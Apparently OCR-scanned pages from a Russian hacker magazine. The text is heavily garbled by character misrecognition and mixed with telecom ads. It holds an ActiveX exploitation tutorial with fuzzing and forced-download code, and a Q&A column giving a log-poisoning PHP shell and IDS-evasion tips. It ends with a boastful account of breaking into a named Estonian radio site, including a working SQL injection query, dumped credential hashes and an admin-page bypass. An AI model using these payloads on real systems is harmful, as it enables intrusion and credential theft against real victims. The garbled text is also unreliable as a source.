в ІЕ, но для этого нам необходимо узнать их СІ_ЗЮ, подсмотреть который 
можно с помощью другой хорошей утилиты (также входящей в состав 
Місгозоіі Ѵізиаі Зіибіо) — ОІ_Е/СОМ ОЬіесіѴіеѵѵег(ОІ_ЕѴІЕѴѴ.ЕХЕ). 

Запустив ее на выполнение, находим в дереве объектов наш «Кален- 
дарь» («ОЬіесІ Сіаззез -> Сопігоі -> СаІепбагСопІго18.0») и, щелкнув по 
немулевой клавишей мыши, выбираем в контекстном меню пунктСору 
СІ_5Ю Іо СІірЬоагб или сразу Сору НТМІ_ <оЬ)есІ> Тад Іо СІірЬоагб. 

Теперь создаем новый НТМІ_-документ, вставляем в него тэг <оЬ]есІ> 
вместе с СІ_5Ю-идентификатором из буфера обмена и добавляем атрибут 
іб, задающий имя переменной, через которую будет осуществляться 
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> Исследование АсІіѵеХ-компонентов 
с помощью утилиты Т5ТС0М32.ЕХЕ 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ) 



Специальное прей ложен не : 



ТЕЛЕФОН 



ИНТЕРНЕТ 

ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 



доступ к методам этого АсбѵеХ-компонента. Имя переменной может 
бытьлюбым (естественно, не вообще любым, а любым в рамкахязыков 
^ѵа- и Ѵізиаі Вавіс Всгірі). 

Вызов методов может осуществляться из любого места НТМЬ- документа. 
Для автоматического вызова лучше всего повеситься на событие опіоасі, 
а для вызова по нажатию клавиши (или другого элемента управления) 

— на событие ОпСІіск. Подробности можно почерпнуть из любой книги по 
ѵѵеЬ-программированию или из МЕРЫ (смотри раздел ІпІіегпеіТооІвапсІ 
Тесбпоіодіев). Ниже приведен предельно простой код, демонстрирующий 
автоматический вызов методов АсбѵеХ- компонента на ^ѵаБсгірДсам 
компонент должен быть предварительно установлен на компьютер). 



» Подключение ■ любом иості 
Мсшкіп.і и М РСКСѴС КОЙ Рбг. 

* Срок :юл н. л ю'іенни ■ М ос кис - 14 дней, 
р Моекевеквй сбя. -от 14 до 30 дней, 

- Установка почмого московскаго телефоннаго номера 



ТЕХНИКА АВТОМАТИЧЕСКОГО ВЫЗОВА МЕТОДОВ АСТІѴЕХ- 
КОМПОНЕНТА, ОСУЩЕСТВЛЯЕМАЯ СРАЗУ ЖЕ ПОСЛЕ ЗАВЕР- 
ШЕНИЯ ЗАГРУЗКИ НТМЬСТРАНИЦЫ 

<оЪзесТ: с1аззісі="СІ8Ій: 8Е27С92В-1264-101С-8А2Р- 
040224009С02 “ ій="оЬі_пате"> </оЬ]есЬ> 



* Многокочалыт* тепефоиные номерз 

• ІР-тпппфОння 



<8СКІРТ РОК=ѵ7ІпсІ<ж ЕѴЕЫТ=оп1оасІ 
ЬАЫСОАСЕ= " аЗсгірІ: " > 

оЬз_паше.ХшеЫіосі(агд1, агд2 , агдЫ) 
</5СКІРТ> 



* ЕЭыд с Пенные ЛМнИИ Интернет 

■ Корпоративны* части не сети 4 V Р'М > 



Для форсированной загрузки АсІіѵеХ-компонентов достаточно 
добавить ктэгу <оЬ]'ес1> атрибут ССЮЕВА5Е, указав ІІРЕ компонента и, 
при необходимости, версию файла. Если версия уже установленного 
компонента выше или равна обозначенной, загрузка осуществляться 
не будет, и, соответственно, наоборот. 



ФОРСИРОВАННАЯ ЗАГРУЗКА АСТІѴЕХ-КОМПОНЕНТОВ 
С УКАЗАННОГО ІІКІ_ 

соЪзесД 

с1аззісІ= " сізісі: 8Е27С92В-12 64-101С-8А2Е- 
040224009С02 " 

ССШЕВА8Е="]і1:і:р: / /тт. Еоо.сош/Ьаг . 
осх#Ѵегзіоп=а , Ь , с , сі" 
і сЗ.— " оЬ;і_пате " > 

</оЬзес!:> 



к Хостинг, услуги сія! а - центра 



РМ Телеком 
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> Отключение уязвимых АсІіѵеХ-компонен- 
тов в редакторе реестра 




> Получение СІ_5Ш интересующего нас 
АсІіѵеХ-компонента с помощью утилиты 



01_ЕѴІЕѴѴ.ЕХЕ 




> Внешний видокна ІЕ, вызывающего 
отключенный АсІіѵеХ-компонент 
«Календарь» 



Ниже приводится законченный НТМІ_ -текст, 
вызывающий «Календарь» и позволяющий 
менять дату путем нажатия на кнопки, располо- 
женные ниже. 

НТМЬКОД, ВЫЗЫВАЮЩИЙ АСТІѴЕХ- 
КОМПОНЕНТ «КАЛЕНДАРЬ» И ПОЗВОЛЯ- 
ЮЩИЙ С НИМ ВЗАИМОДЕЙСТВОВАТЬ 

<нтмь> 

<ВОБУ> 

соЪзесР с1аззісі= ' сізісі: 8Е27С92В- 
1264-101С-8А2Р-040224009С02 ' 
ісІ= 1 ЬезЪ ' > </оЬзесЬ> 

<вк> 

<іприС 1апдиаде=ѴВЗсгірР 
опс1іск=ргеѵ( ) 1:уре=ЬибРоп 
ѵа1ие= ргеѵ "> 

<іприС 1апдиаде=ѴВЗсгірЬ 
опс1іск=1:с1ау ( ) 1:уре=ЬибРоп 
ѵа1ие=" [ Сойау ] "> 

сіприС 1апдиаде=ѴВЗсгірС 
опс1іск=пхЬ(і( ) буре=ЪиРЪоп 
ѵа1ие=" пехЪ --> "> 

<зсгірС 1апдиаде= 1 ѵЬзсгірР ' > 
зиЬ ргеѵ 

ЪезЪ . РгеѵіоизБау 

епй зиЬ 
зиЬ Цсіау 

СезС . Тойау 

епсі зиЬ 
зиЬ пхрсі 

СезС .ЫехЦБау 

епсі зиЬ 
</зсгірк> 

</ВОБУ> 

</НТМЬ> 

Вновь возвратившись кутил ите АсбѵеХ Сопігоі 
Тез! Сопіаіпег, среди прочих компонентов мы 



обнаружим АбоЬе АсгоЬаІ: СопІтоНЪгАсбѵеХ 
(если, конечно, АсгоЬаІ Веабегустановлен на 
целевой машине), один из методов которого 
зовется І_оасІРіІе и, в полном соответствии со 
своим названием, загружает рсИ-файл для его 
отображения. 

Для разнообразия НТМІ_-код, демонстрирую- 
щийтехнику его вызова, написан на ^ѵаВсгірк 

НТМЬКОД, ВЫЗЫВАЮЩИЙ МЕТОД 
І_ОАОЕІІ_Е АСТІѴЕХ-КОМПОНЕНТААООВЕ 
АСВОВАТ СОМТВОЬ РОК АСТІѴЕХ ПРИ 
ОТКРЫТИИ СТРАНИЦЫ 

<нтмь> 

<ВОБУ> 

<оЬ^есС с1аззісІ="с1зісІ:СА8А9780- 
280Б-11СР-А24Б-444553540000 " 
ЖБТН=600 

НЕКЗНТ=600 ісІ=асгоЪаЦ> 

</о!^есЪ> 

<ЗСКІРТ РОК=Жпйоѵѵ ЕѴЕЫТ=оп1оай 
ЬАШБАСЕ= " аЗсгірЬ " > 

асгоЬаР . ЬоасІРіІе ("Б:\\ 
ехгеѵ.рсіі: " ) 

</ЗСКІРТ> 

< / БОБУ > 

</НТМЬ 

Передавая методу І_оасіРіІе строки 
переменной длины в качестве аргумента, 
пытаемся выяснить, происходит переполне- 
ние буфера или нет. В данном случае 
переполнение не происходит, поэтому 
необходимо продолжить исследования, 
перебирая АсІіѵеХ-компоненты один за 
другим. 

Причем создавать строковые аргументы 
вручную совершенно необязательно и можно 



воспользоваться языковыми библиотеками или, 
на худой конец, циклами (в частности, команда 
5ігіпд(69000000,"А"), поддерживаемая Ѵізиаі 
Вазіс Всгірр конструирует строку, состоящую из 
690 миллионов символов «А»), 

Еще пара замечаний напоследок. Как мы уже и 
говорили, для реанимации эксплойтов, добытых 
в Сети, обычно требуется задействовать форси- 
рованную загрузку АсбѵеХ- компонентов, указав 
ІІВІ_, но откуда нам знать, какой именно ІІНІ_ 
указывать? 

Если повезет, необходимый АсбѵеХ-ком- 
понент отыщется прямо на ѵѵеЬ-сервере 
компании (смотрим перечень опііпе-служб, 
находим требуемую, выдираем из НТМІ_-кода 
нужный ІІРІ_, вставляем его в эксплойт и 
радуемся жизни). Однако если АсІіѵеХ-ком- 
понент входит в состав продукта, устанавли- 
ваемого на машину, то никакого I) В І_ нарыть 
не удастся. Хуже того, дыры в Ас1:іѵеХ-ком- 
понентах, выложенных на официальных 
серверах, достаточно быстро закрываются, 
и эксплойты перестают работать. Решение 
состоит в размещении АсііѵеХ- компонента 
на нашем собственном ѵѵеЬ-сервере (или 
бесплатном хостинге). Но для этого уязвимый 
АсбѵеХ-компонент необходимо как-то запо- 
лучить. А как его заполучить? Да очень просто 
— воспользоваться услугами служб, хранящих 
кучу разнообразных динамических библиотек 
и раздающих их всем желающим на халяву 
(например, ѵѵѵѵѵѵ.сіѵпатісііпк.пі или уууууу.сШ.- 
боѵупіоасіз.сот ). 

Вообще говоря, мы можем написать свой 
собственный АсбѵеХ- компонент, делающий с 
компьютером жертвы все что угодно. Единс- 
твенная проблема — в цифровой подписи, точ- 
нее, в отсутствии таковой, ведь неподписанные 
АсбѵеХ-компоненты ІЕ по умолчанию загружает 
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только после выдачи подтверждения. Впрочем, выдача цифровой под- 
писи — достаточно формальная процедура, да и большинство пользо- 
вателей на все непонятные вопросы отвечает «Уев», не задумываясь. О 
технике создания АсбѵеХ-компонентов на чистом Си можно прочитать 
в цикле статей на ѵѵѵѵѵѵ.собергоіесЕсогп/согп/сот іп сі.азр . 

Но прежде чем атаковать других, необходимо обезопасить свой 
компьютер, чтобы нас не поимели, а то какие же мы будетхакеры после 
этого? Самое простое (и самое хакерское) решение — не использовать 
этотослоподный ІЕ, отдав предпочтение Рысю, ГорящемуЛису, Опере 
или любому другому браузеру, не поддерживающему АсбѵеХ. Также 
необходимо перестроить ІЕтак, чтобы он не был браузером по умолча- 
нию, в противном случае щелчок по ссылке, содержащейся в письме 
(или НТМІ_-код, автоматически запускающий браузер), порвет нас как 
Тузик грелку. 

Однако что делать, если нам необходимо просматривать сайты, 
основанные на АсЛѵеХ? Можно, конечно, включить подтвержде- 
ние на запуск и загрузку АсЛѵеХ-компонентов, включая подпи- 
санные. Но тогда ІЕ задолбает нас подтверждениями, да и к тому 
же если компьютер приходится делить с другими членами семьи 
(женой, детьми), попробуй им объясни, когда можно нажимать 
«Уев», а когда нет. 

Покопавшись в базе знаний МісгозоЛ, мы найдем любопыт- 
ную заметку «Ноѵѵ Іо зіор ап АсЛѵеХ сопІтоНтот гиппіпд іп 
Іпіетеі Ехріогег», описывающую, как отключить выборочные 
АсІіѵеХ-компоненты, не затронув остальные ( ШрУ/виррогЕ 
тісгозоЛ.сот/кЬ/240797 ). Запускаем редактор реестра, заходим 
в ветвь НКЕМ\50РТѴѴАНЕ\МісгозоЕ\ІпІегпе1: ЕхрІогег\АсЕѵеХ 
СотраЕЬіІіІу, находим СІ_5Ю уязвимого АсІіѵеХ-компонента 
(например, для Ьрцѵѵѵосх.сІІІ это будет ВА726ВР9-Е02Р-461 В- 
9447-С05С7066СЕ80). Если же его там нет — создаем. Меняем 
значение параметра СотраЕЬіІіІу Ріадз (типа 0ѴѴ0Р0) на 0x400 
— и все! Теперь этот АсЕѵеХ-компонент больше вызываться из ІЕ 
не будет! Причем наличие самого АсЕѵеХ-компонента на машине 
необязательно. Да, при форсированной загрузке ІЕ по-прежнему 
продолжит скачивать его из инета, но с вызовом методов конкрет- 
но обломится. Поэтому для защиты своего компьютера доста- 
точно просматривать свежие АсЕѵеХ-эксплойты и блокировать 
их СІ_5Ю'ы (или же, как вариант, устанавливать их обновленные 
версии, конечно, при условии, что они естьі.тг 
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ЕВГЕНИЙ «СОВѴѴІМ» ЕРМАКОВ 

/ НАСК-РАО@ВЕАІ_. ХАКЕР. ВЦ / 




ІО»0: ЧЕМ МОЖНО ОПРЕДЕЛИТЬ СТАТУС ЧЕЛОВЕКА В МОЕМ ІСО- 
КОНТАКТЕ? ВЕСЬ СОФТ, КОТОРЫМ Я ПОЛЬЗОВАЛСЯ РАНЬШЕ, 
СЕЙЧАС НЕ РАБОТАЕТ. 



никому, кроме разработчика. Вот пример генератора случайных 
чисел в интервале от 0 до 2 32 -5 (ОхРРРРРРРВ) из книги «Математи- 
ческие и компьютерные основы криптологии»: 



Совсем недавно ру-асечники написали новую программу для 
чека статуса номеров — пеѵѵезі іпѵізіЬіІИу сЬескег [ ЬНрѴЛогит. 
а5есЬка.ги/сІоѵѵп[оасІ5/піс20 04032007.2Ір 1. Ріо эта утилита не 
гарантирует стопроцентно правильного определения статуса. 
Перед ее применением советую зарегистрировать новый ненуж- 
ный аккаунт, поскольку после нескольких проверокаккаунт могут 
блокировать. 

СЛЫШАЛ ПРО НЕКИЙ СОФТ, С ПОМОЩЬЮ КОТОРОГО ЛЕГКО 
МОЖНО «УБИТЬ» ЛЮБУЮ МОБИЛУ. ТАМ ВРОДЕ КАК ОТПРАВЛЯЕТСЯ 
СПЕЦИАЛЬНАЯ БМБ’КА, КОТОРАЯ ВЫКЛЮЧАЕТ ТЕЛЕФОН. 

ГДЕ ТАКОЙ МОЖНО ДОСТАТЬ? 

Скажу сразу, лично я подобных программ не видел, да и вряд ли 
они существуют. Вот несколько лет назад было вполне возможно 
отправить телефон в даун посредством некой втз’ки, поскольку 
некоторые модели телефонов (например, Егісззоп) некорректно 
обрабатывали определенные символы, но сейчас это неактуаль- 
но. Альтернативный способ взлома — использованиеуязвимос- 
тей в блютусе. Благо здесь нехватки софта нет. 

НАСКОЛЬКО БЕЗОПАСНА ФУНКЦИЯ КАЫОП ДЛЯ ГЕНЕРИРОВА- 
НИЯ ВАЖНЫХ ДАННЫХ? ЯЗЫК С++. 

Во-А: Под важными данными, я так понял, подразумеваются данные вроде 
паролей. Вообще функция гапсЦ) — это генератор псевдослучай- 
ных чисел. Каждое следующее число, выдаваемое этой функцией, 
получается из предыдущего с помощью формулы. РапсІ выдает 
предсказуемые значения, поскольку является линейно согласую- 
щейся функцией. При этом результат можетзависеть от платфор- 
мы, то есть значения на разных компьютерах будут различаться. В 
любом случае функция гапсіО небезопасна в приложениях, требую- 
щих высококачественной случайной последовательности чисел. 

Я советую писать свои алгоритмы для генерации случайных значений, 

принимающие несколько параметров, которые не будут известны 



Х(п+1) = (117б*Х(п) + 1476*Х(п-1) + 177б*Х(п-2) ) % (2 А 32 - 5) 

При инициализации задается 3 числа. Х(п) — последовательность, п — но- 
мер числа в последовательности. 

Однако можно воспользоваться и СгурКЗепВапсІотО, входящей в Сгурі АРІ 
(определена в ѴѴіпСгурГЫ, которая генерирует непредсказуемые 
последовательности чисел. Генерация основывается на множес- 
тве данных: текущем времени, идентификаторе процесса, данных 
счетчиков производительности, информации о процессах и даже 
возможном содержимом буфера обмена. После генерации идет 
хэширование по 5НА-1 . 

Вообще, это довольно интересная и сложная тема, заслуживающая пол- 
ноценной статьи, но журнал не резиновый, и поэтом дальнейшее 
знакомство с рандомизацией я советую тебе продолжить, пройдя 
по следующим ссылкам: 

Ь^рѴ/Нс.сІоІзгс.огаМсМсІ 750.бІтІ — ВЕС 1 750 Вапсіотпезз 
РесоттепбабопзЬгЗесигНу; 

Ы:1:р://г5СІп.ги/агІіс[е/сгѵр1:о/и5Іпасгѵр1оарі.хт[ . Ьир:/Логит.ѵіпагасІ. 
ги/Ьа5е/СгурІоАРІ-2701 .Ыті — мануалы по Сгуріо АРІ; 

ЬНрѴ/сііЬгит.ги/зесигііу/агіісІез/сІеТепзе — статья «ОеІрЫ и ѴѴіпсІоѵѵз АРІ 
для защиты секретов». 

^>0; РЕАЛЬНО ЛИ СЕЙЧАС ЗАРАБОТАТЬ НА КИБЕРСКВОТТИНГЕ 

— РЕГИСТРАЦИИ И ПРОДАЖЕ КРАСИВЫХ ДОМЕНОВ? И КАК ОПРЕ- 
ДЕЛИТЬ СТОИМОСТЬ ДОМЕНА? 

Во-А: Получить прибыль, сопоставимую стой, которую можно было 
выручить пару лет назад, сейчас, конечно, не удастся. Боль- 
шинство красивых доменов уже занято. Советую посетить 
специализированные ру-форумы потеме — ЬНр://сІпсІіаІоа.сот . 
ЬКр://сІотепіогит.пеі . Там можно продавать, оценивать домены, 
устраивать аукционы. Существуетонлайн-сервис по оценке до- 
менов — но доверять ему в полной мере 
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не стоит :). Вот что мне выдал анализатор на домен Ьир://хакер.ги : 
«Рыночная стоимость да иного адреса составляет от $2521 8,87 
до $27460,55» (надо бы толкнуть его незаметно, а деньги пропить 
всей редакцией :) — примечание РогЬ’а). 

НЕДАВНО СТАЛ АДМИНИТЬ СЕРВАК, НО ОПЫТА МАЛО, И ПО- 
ЭТОМУ БЫСТРО ПОЛОМАЛИ. НЕ ЗНАЮ, С ЧЕГО НАЧАТЬ, ГДЕ КАКИЕ 

БАГИ ЗАКРЫТЬ? 

&0*А: Сначала смотрим на присутствие веб-сервера и наличие различ- 
ных скриптов, как правило, взломщики получают доступ именно 
через бажные скрипты. Сразуже включаем защищенный режим 
— 5АРЕ_МСЮЕ. Если используются паблик-скрипты.тотутпрямая 
дорога на багтраки вроде ЬНрУ/зесипЕ/.ппоу.ги с последующим 
латанием дыр. Смотрим листингпортов пеізіаі: -ап Ідгер ЕІ5ТЕЫ. 
Затем переходим к различным сервисам, таким как РТР, 55Н ит.д. 
Составляем список всех сервисов, смотрим версию ядра и опять- 
таки обращаемся кбагтракам. Если обнаружены бажные сервисы, 
то обновляем их. Ріо если взломщик получил полные права — пра- 
ва рута, то без специализированныхутилиттутне обойтись. Обыч- 
но во взломанную машинуустанавливается руткит, который можно 
отловитьтулзами РооІкііЬипІегІ ЬНрУ/гооШТпІ ) или СЬгооІкіЕ Они 
выявляют большинство известных руткитов и бэкдоров, смотрят 
чексуммы приложений, права и ищут подозрительные ЬКМ-моду- 
ли. Ну и стоит поставить Ю8, например ірІаЫеБ или 5ІМОРТ. 

&О»0іКАК НАЧИНАЮЩИЙ ПРОГРАММИСТ НА С++ ПОД ШШХ Р ХОЧУ 

СПРОСИТЬ, КАКИМ БАГАМ ПОДВЕРЖЕНЫ ПРИЛОЖЕНИЯ ПОД ПИНГ- 
ВИНОМ И КАК ОТ НИХЗАЩИТИТЬСЯ? 

&0-А: Проблемы, возникающие в ѴѴіпсіоѵѵб, могут возникнуть и в*піх — то 
же самое переполнение буфера при работе с массивами или стро- 
ками. Поэтому настоятельно рекомендую использовать в своих 
программах, к примеру, функцию деШпеО, выделяющую буфер 
требуемой длины динамически и прекращающую принимать 
данные при полном заполнении буфера. Пример: 

сііаг* ѵагіаЫе = деЕІіпе (ШЬЬ, 0, вбсііп) ; 

ДРУГ ГОВОРИТ, ЧТО ЕМУ УДАЛОСЬ КАКИМ-ТО ОБРАЗОМ СЛО- 
МАТЬ СЕРВЕР ЧЕРЕЗ ЛОГИ. НО КАК ТАКОЕ ВОЗМОЖНО? 

&0-А: По-видимому, твой друг получил права в системе посредством 

локального инклуда логов сервера, в которых прописана строка- 
шелл. ТеІпеРом или через браузер посылается запрос, содержа- 
щий шелл/команду: 

Ъ.ЪЦр : / /Ьагдеб . сот/ <зсгірЦ 1апдиаде=рЬр>рЬріп:Ео ( ) ;</зсгірЕ> 

Далее, имея на сервере бажный скрипт, мы инклудим логи: 

Ь^Ьр://ЬагдеЬ.согп/5СгірЬ.рЬ.р?рагашеЬг=. 
арасЪе / Іодз / ег г ог_1од 

Сложность в том, что точного пути клогам мы незнаем и придется тупо 
перебирать возможные варианты. 

Список возможных путей в Апаче смотри на нашем 0Ѵ0. 



^1): В ЖУРНАЛЕ ПИСАЛИ ОБ Ю5 В ѴѴІ-Н СЕТЯХ, ПОЗВОЛЯЮЩИХ 
ВЫЧИСЛИТЬ ХАКЕРА, НО КАК ВЗЛОМЩИКУ НЕ ПОПАСТЬСЯ 
НА ТАКИЕ СИСТЕМЫ И НЕ ДАТЬ СЕБЯ ОБНАРУЖИТЬ? 

&0*А: Самые известные методы — это подделать МАС-адрес и не 

использовать активное сканирование. Как и в случае логирую- 
щих серверов, которые можно задосить, в беспроводных сетях 
возможен 0о5 на сенсоры систем Ю5. Также во время перехвата 
трафика следует уменьшать мощность передатчика. Но все эти 
приемы тебе не помогут, если ты будешьтупо бродить по зданию 
с ноутом :). 

^>0: КАКИМ ОБРАЗОМ ЗАПРЕТИТЬ ПОДКЛЮЧЕНИЕ К МѴБОЬ 
ИЗ СЕТИ? НУЖНА ОБРАБОТКА ЗАПРОСОВ ТОЛЬКО С ЛОКАЛЬНОЙ 
МАШИНЫ. 

&С?А: Очень просто! Для этого открываем файл ту.спі и в разделе [туздісі] 
пишем «зкір-пеіѵѵогкіпд» или биндим к ір — «ЬіпсІ-асІсІгезБ = 
127.0.0.1». 

^>0: В КАЧЕСТВЕ ХОББИ ИЩУ УЯЗВИМОСТИ В СКРИПТАХ И ИЗРЕД- 
КА ПУБЛИКУЮ ИХ НА СВОЕМ САЙТЕ, НО В ПОСЛЕДНЕЕ ВРЕМЯ СТАЛ 
ЗАДУМЫВАТЬСЯ, МОГУТ ЛИ НА МЕНЯ ИЗ-ЗА ЭТОГО ПОЙТИ АБУЗЫ 
ХОСТЕРУ? 

&С?*А: Скажу сразу и однозначно: да. Моих зарубежных знакомых 
однажды за это прикрыли. Они выложили информацию о 
баге с прямой ссылкой на сайт, на котором установлен этот 
скрипт. Продукт был довольно раскручен, и производители не 
заставили себя долго ждать, вскоре написав письмо хостеру. 
Конечно, тут нужно было разбираться, но хостер, не думая, 
просто закрыл доступ. Поэтому в публикациях не следует пи- 
сать адрес бажного сайта, в противном случае нужно покупать 
абузоустойчивый хостинг. 

^>0: Я НЕМНОГО ОСВОИЛ ОСНОВЫ КРЯКИНГА, НО НЕ МОГУ НАЙТИ 
ПРОГРАММЫ С ПРОСТОЙ ЗАЩИТОЙ. КАКИЕ УТИЛИТЫ МОЖЕШЬ 
ПОСОВЕТОВАТЬ ДЛЯ ПРАКТИКИ? 

&0*А: Ну, проще всего взломать программу с ключом, лежащим в от- 
крытом виде. Программы, на которых можно потренироваться, 
можно найти на форуме СгаскІаЬ'а: бирѴ/сгаскІаЬ.гиА/іпсіех. 
рЬр?асбоп=ѵіЬгеаб&і : огит=5&Іоріс=6085 . Но в любом случае я 
тебе этого делать не советую хотя бы потому, что это противоза- 
конно ;], лучше зайди на сайт вроде ШрѴ/сгасктез.сІе и выбери 
для практики специально предназначенные для взлома 
сгаскте. 

^>0: ПРОЧИТАЛ ПРО УГОН БОТНЕТОВ, НО СРАЗУ ПОНЯЛ, 

ЧТО У САМОГО НЕ ПОЛУЧИТСЯ. ВО-ПЕРВЫХ, НЕ СУМЕЛ УСТАНОВИТЬ 
5А№В0Х; ВО-ВТОРЫХ, ОТКРЫВАТЬ ПОРТЫ НА СВОЕМ ПК ОПАСНО. 
ЕСТЬ Л И АЛЬТЕРНАТИВА? 

&С?А: Прийти к другу и ловить разного рода тварей на его компьютер :). 

Нет, альтернатива, конечно же, есть, но в любом случае придется 
идти на некий риск. Например, можно использовать программы, 
создающие контрольныеточки-копиитвоего харда и после пере- 
загрузки возвращающие систему в исходное состояние. Это такие 
утилиты, как Оівк ѴѴгіІе Сору, йеерРгееге. ИНИ 
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'ЛЕОНИД «ВОЮ» ОТРОЙКОВ 



Наш ответ Эстонии 



Злостный взлом эстонского радио 

Об Эстонии в последнее время говориться очень много; события на территории этой, некогда со- 
юзной, страны получили широкий резонанс в обществе. Посольство в Москве закидывают яйца- 
ми, в Таллине митингуют, но все это оказывается шуточками по сравнению с тем, что происходит в 
интернете. Пророссийски настроенные хакеры обрушивают шквал атак на сайты и компьютерные 
сети небольшой прибалтийской страны. Все это имеет такие масштабы, что правительство Эсто- 
нии даже обращается к институтам международного права за защитой. Но все бесполезно — ха- 
керский гнев, выражаемый сотнями терабайт ір-пакетов, не остановить. Мы решили выяснить, так 
ли уж сложно сломать эстонский сайт. Ничего личного, но сломали :). 



Говорит Москва 

Зайдя на Гугл и вбив в строке поиска незамысловатое «іпигГ.ее», я 
принялся парсить эстонские ресурсы, располагающиеся в национальной 
доменной зоне Эстонии (.ее). То и дело проскакивали хостинги, институты, 
шопы и прочие проекты, так что через несколько часов активного отдыха 
ака парсинга в закладках моего браузера прибавилось с десятка два 
линков на бажные .ее-сайты. Прикинув объем предполагаемой работы, я 
начал разгребать напарсенное в надежде наткнуться на что-нибудь дейс- 
твительно интересное :). Однако от этого занятия меня отвлекла мессага, 
прилетевшая в аську от одного из моихдавнихзнакомых. Мы обменялись 
парой сообщений, и наш разговор плавно перетек в русло эстонско-рос- 
сийского конфликта, после чего мой знакомый скинул мне линкэстонского 
сайта, который, по его словам, на дняхуже пытались взломать. Скопировав 
в адресную строку Оперы урл ѵ\лл/ѵѵ.гаасііо7.ее и нажав на «Епіег», я оказался 
на сайте эстонского радио Раасііо 7. Как выяснилось позже, ресурс был 
достаточно крупным, кроме того, это радио осуществляло интернет-веща- 
ние, в связи с чем еще сильнее заинтересовало меня =). В первую очередь я 
решил чекнуть потенциальную жертву на ѵѵѵѵм.богпаіпзсіЬ.пеІ . 



Увы, но полученные данные не отличались конкретикой. Поэтому я ре- 
шил незамедлительно приступить к анализу движка на сайте Наасііо. 
На легкую прогулку я не рассчитывал, но сказать, что я был удивлен, 

— значит не сказать ничего. После получасового поверхностного 
осмотра двига я прибывал в полушоковом состоянии. Ресурс был 
практически изъеден зрі-инъектами, которые встречались везде, где 
только можно. 

Также имела место инъекция и в поле логина юзеров. Поковырявшись 
еще минут 1 0, я даже обнаружил активную хбб. 

Создавалось впечатление, что программисты, писавшие двиг, 
курили какую-то загадочную траву и делали это с завидной регуляр- 
ностью. По опыту скажу тебе, что если программеры курят, то обычно 
они делятся травой с админом =). Поэтому я принялся раскручивать 
найденные баги. Наиболее удобный для реализации инъект был 
в скрипте БааІесІ.аБр. Обойдя фильтрацию символов с помощью 
аез_сІесгур1:/ае5_епсгур1: и поиграв с параметрами, я выяснил, что 
на сервере крутится винда, а в качестве БД стоит Му5СН_ версии 
4.1 . 1 2. Кроме того, удалось выдрать аккаунты из туБЦІ.изег: 
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ЪДЦр : //ѵтѵго*. гаас!іо7 . ее/зааЬесІ. авр?ісІ=9999 + 
ипіоп+зеіесб+і ,2,3,4, аезщіесгурЦ (аез_епсг 
урД (СОЫСАТ (изег , %20СНАК (32 ,45,32) , %20разз 
ѵгогсі) ,0x71) ,0x71) , б+ігош+шузді . изег/* 

Ксожалению, часть пассов лежала в хэше 5НА-1 : 

гооД - *АБ4В23Е06ВАС7Б62А0786ВАС66ЕС876А5 
ЗЕ24443 

Сееіізбе - *1ЕВЗЕВ5494С65Е34А15285А87В7712 
Е29В7250РВ 

24x7 - 248Ые9бЗ 1е80077 

Забегая вперед, скажу, что брутхэшей результатов не дал. 

Не получилось подобрать и названиетаблички в базе. 
Вероятно, часть инфы хранилась в тсІЬ. Тогда я решил поп- 
робовать проинсертить тузці.изег и добавить новую учетку. 
Чудо-запрос в общем виде ты можешь найти на нашем БѴО. 
Но, как я ни старался, «мускул» был непреклонен. В итоге, 
задумка с инсертом отправилась в/сіеѵ/пиіі. Кэтому времени 
за окном давно стемнело и уже чувствовалась усталость от 
проделанной работы. Плюнув на Паасііо 7 вместе с их сайтом, 
я выключил ноути легспать. 

Наше дело правое, победа будет за нами ! 

Проснувшись, первым делом я зашел на сайтвсетого же 
радио. Какая-то непреодолимая сила тянула меня на этот 
ресурс, а учитывая найденные баги, бросать взлом на полпу- 
ти я совершенно не планировал. Собравшись с мыслями, я 
решил попробовать пойти в обход, то есть атаковать с фланга. 
Под этим самым флангом я подразумевал найденную мину- 
той раньше админку ресурса, которая, как ни странно, лежала 
в стандартном каталоге по адресу: 

ѵтупу. гаас!іо7 . ее/абтіп/ 

Входящие в поля логина данные успешно фильтровались, 
что исключало присутствие инъекта. Мое внимание 
привлекла еще одна деталь — название админки: 
5оигсе40еѵеІорегз Роііѵі ,1 . Тутже возникла идея во 
что бы то ни стало найти сорцы этого двига. Первоначально 
я надеялся на то, что скрипты админки, которые были напи- 
саны на А5Р, взаимодействуют с «мускулом». Следовательно, 
я бы могузнать названиетаблички, хранящей админские 
аккаунты, и через имеющийся инъект выдрать логин/пасс ад- 
министратора Паасііо 7. На поисксорцов ЗоигсеДОеѵеІорегз 
Роііушло больше получаса. Причем удалось слить лишь 
более старую версию, и то с какого-то Богом забытого забу- 
горного варезника. Как выяснилось, двиг представлял собой 
систему опросов, а в каталоге /абтіп обитали интересующие 
меня азр-скрипты. Открыв сЫаиІІ.азр, который отвечал 
за процесс логина в админку, я выдрал из него лишь одну 
строчку: 

зеІесЪ [АсІтіпізДгаДог] , [РаззДОогсІ] бгош 
ро11_А<±піп 



Однако 5оигсе40еѵе1орегз Роіі работал вовсе не с «муску- 
лом», а с лежавшей в каталоге /ба Іа базой роІІ.тсІЬ. Этот факт 
заставил меня впасть в раздумье. Изучив оставшиеся скрип- 
ты, я заметил, что защита от неавторизированного доступа к 
админке была реализована с помощью куков, а содержимое 
роІІрго(:есГіпс давало объяснение этому: 

Іб Кедиезб . Соокіез ( " РоІІАбшіп" ) = "" ТЬ.еп 
Кезропзе . Шгібе ( " <Ыхсепбег>Уои Аге 
ШаиЫіогігесІ То Ѵіем ТЬіз Зесбіоп.с/ 

ЫхЬгха Ьгеб= ' /сіебаиіс . азр ' >Ноше Радес/ 
а>" ) 

Кезропзе . Епсі 
Епб. Іб 

Таким образом, при отсутствии нужных куков меня попросту 
должно было редиректить на страницулогина — сЫаиІб.азр. 
Решив поэкспериментировать, я вручную вбил адрес, содер- 
жащий в себе путь к скрипту смены админского аккаунта: 
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> При наличии прав 
в базе можно с 
легкостью проин- 
сертить табличку 
тузці.изег и доба- 
вить своего юзера. 

> Никогда не 
старайся атако- 
вать лишь с одной 
стороны, вариантов 
зачастую больше, 
чем два — стоит 
лишь внимательнее 
присмотреться =). 



у/ѵлу . гаасІіо7 . ее/абтіп/с]іапде_раззѵюгс1. азр 

Когда страничка загрузилась, в поле имени юзера я 
прочел: «абгпіпізігаіог», а вот поле пасса было скрытым. 
Но я не поленился посчитать количество звездочек (их 
оказалось 7 =)]. Глянув на домен ресурса и прикинув, что в 
